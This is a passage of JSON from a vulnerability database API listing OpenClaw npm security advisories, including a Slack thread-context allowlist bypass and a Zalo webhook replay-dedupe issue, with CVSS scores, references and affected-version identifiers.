                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-ccx3-fw7q-rr2r"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42420",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42420"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-improper-base64-decoding-size-validation",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-improper-base64-decoding-size-validation"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-ccx3-fw7q-rr2r",
                    "reference_id": "GHSA-ccx3-fw7q-rr2r",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-ccx3-fw7q-rr2r"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-42420",
                "GHSA-ccx3-fw7q-rr2r"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-psms-gauf-tkbz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92825?format=api",
            "vulnerability_id": "VCID-q6ne-sw1r-xkd1",
            "summary": "OpenClaw: Slack thread context could include messages from non-allowlisted senders\n## Summary\n\nBefore OpenClaw 2026.4.2, Slack thread starter and thread-history context fetched through the API was not filtered by the effective sender allowlist. Messages from non-allowlisted senders could still enter the agent context when an allowlisted user replied in the same thread.\n\n## Impact\n\nA Slack deployment that relied on sender allowlists could still feed non-allowlisted thread content into the model context through thread history. This was a sender-access-control bypass on Slack thread context, not a direct channel-auth bypass.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `ac5bc4fb37becc64a2ec314864cca1565e921f2d` — filter Slack thread context by the effective allowlist\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41358",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00017",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04402",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00017",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04376",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00017",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0439",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41358"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/ac5bc4fb37becc64a2ec314864cca1565e921f2d",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:34:23Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/ac5bc4fb37becc64a2ec314864cca1565e921f2d"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qm77-8qjp-4vcm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:34:23Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qm77-8qjp-4vcm"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41358",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41358"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-slack-thread-context",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:34:23Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-slack-thread-context"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qm77-8qjp-4vcm",
                    "reference_id": "GHSA-qm77-8qjp-4vcm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qm77-8qjp-4vcm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "CVE-2026-41358",
                "GHSA-qm77-8qjp-4vcm"
            ],
            "risk_score": 2.5,
            "exploitability": "0.5",
            "weighted_severity": "4.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-q6ne-sw1r-xkd1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89752?format=api",
            "vulnerability_id": "VCID-q9jf-srt4-fbcg",
            "summary": "OpenClaw: Zalo replay dedupe cache could suppress events across authenticated webhook targets\n## Summary\n\nBefore OpenClaw 2026.3.31, the Zalo webhook replay-dedupe cache was shared across authenticated webhook targets and keyed too broadly. In multi-account deployments, a replay seen on one account could suppress a legitimate event on another account if `event_name` and `message_id` matched.\n\n## Impact\n\nAn attacker who controlled one authenticated Zalo webhook path in a multi-account gateway deployment could cause silent message suppression on a different Zalo account sharing that gateway. This was an availability issue; it did not provide cross-account authentication or data access.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `>= 2026.2.19, < 2026.3.31`\n- Patched versions: `>= 2026.3.31`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `4d038bb242c11f39e45f6a4bde400e5fd42e4ebf` — scope webhook replay dedupe per target\n- `7cea7c29705b188b464cc9cdc107c275b94b2a72` — follow-up hardening to scope replay dedupe by path and account\n\n## Release Process Note\n\nThe initial fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains follow-up hardening for the same surface.\n\nThanks @nexrin for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/7cea7c29705b188b464cc9cdc107c275b94b2a72",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/7cea7c29705b188b464cc9cdc107c275b94b2a72"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fqrj-m88p-qf3v",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fqrj-m88p-qf3v"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-fqrj-m88p-qf3v",
                    "reference_id": "GHSA-fqrj-m88p-qf3v",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-fqrj-m88p-qf3v"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
